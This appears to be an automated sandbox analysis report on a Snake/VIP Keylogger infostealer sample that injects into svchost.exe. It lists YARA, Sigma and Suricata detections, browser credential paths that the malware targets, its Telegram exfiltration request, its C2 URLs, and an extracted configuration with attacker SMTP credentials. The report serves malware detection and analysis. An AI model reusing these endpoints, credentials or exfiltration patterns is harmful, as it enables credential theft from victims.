2.2.svchost.exe.7c00000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
2.3.svchost.exe.326bf20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.3.svchost.exe.326bf20.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.326b000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x314cf:$s1: UnHook 0x3146b:$s2: SetHook 0x314a4:$s3: CallNextHook 0x31433:$s4: _hook
2.3.svchost.exe.326bf20.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
0.2.lsc5QN46NH.exe.21a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.svchost.exe.7ca0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7ca0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7ca0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7c00f20.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7c00f20.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7c00f20.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7c00f20.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7ca0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.7c00f20.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.7ca0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7c00f20.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7ca0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
2.2.svchost.exe.7c00f20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.3374f2e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.3374f2e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
Click to see the 76 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\lsc5QN46NH.exe", CommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", ParentImage: C:\Users\user\Desktop\lsc5QN46NH.exe, ParentProcessId: 6644, ParentProcessName: lsc5QN46NH.exe, ProcessCommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", ProcessId: 6012, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\lsc5QN46NH.exe", CommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", ParentImage: C:\Users\user\Desktop\lsc5QN46NH.exe, ParentProcessId: 6644, ParentProcessName: lsc5QN46NH.exe, ProcessCommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", ProcessId: 6012, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:13:38.298023+0100	2803305	3	Unknown Traffic	192.168.2.8	49706	104.21.80.1	443	TCP
2025-01-10T22:13:41.639770+0100	2803305	3	Unknown Traffic	192.168.2.8	49712	104.21.80.1	443	TCP
2025-01-10T22:13:46.038913+0100	2803305	3	Unknown Traffic	192.168.2.8	49721	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:13:36.248694+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49704	193.122.130.0	80	TCP
2025-01-10T22:13:37.733222+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49704	193.122.130.0	80	TCP
2025-01-10T22:13:38.842442+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49707	193.122.130.0	80	TCP
2025-01-10T22:13:39.951861+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:13:46.957061+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49723	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}
Source: 2.2.svchost.exe.7ca0000.4.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: lsc5QN46NH.exe	Virustotal: Detection: 31%			Perma Link
Source: lsc5QN46NH.exe	ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: lsc5QN46NH.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: lsc5QN46NH.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49723 version: TLS 1.2

Source:	Binary string: _.pdb source: svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: lsc5QN46NH.exe, 00000000.00000003.1513568733.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1514623709.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: lsc5QN46NH.exe, 00000000.00000003.1513568733.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1514623709.0000000003F50000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0066445A
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066C6D1 FindFirstFileW,FindClose,	0_2_0066C6D1
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0066C75C
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0066EF95
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0066F0F2
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0066F3F3
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006637EF
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00663B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00663B12
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0066BCBC

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09042834h	2_2_09042580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09043206h	2_2_09042DE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09040D10h	2_2_09040B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904169Ah	2_2_09040B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904D3D4h	2_2_0904D128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09043206h	2_2_09043134
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904D82Ch	2_2_0904D580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904DC84h	2_2_0904D9D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09043206h	2_2_09042DE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_09040040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904FAECh	2_2_0904F840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_09040856
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904CF7Ch	2_2_0904CCD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904EDE4h	2_2_0904EB38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904F23Ch	2_2_0904EF90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904F694h	2_2_0904F3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904E0DCh	2_2_0904DE30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_09040676
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904E534h	2_2_0904E288
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0904E98Ch	2_2_0904E6E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49723 -> 149.154.167.220:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.122.130.0 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.80.1 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:29:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49706 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_006722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_006722EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:29:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 21:13:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
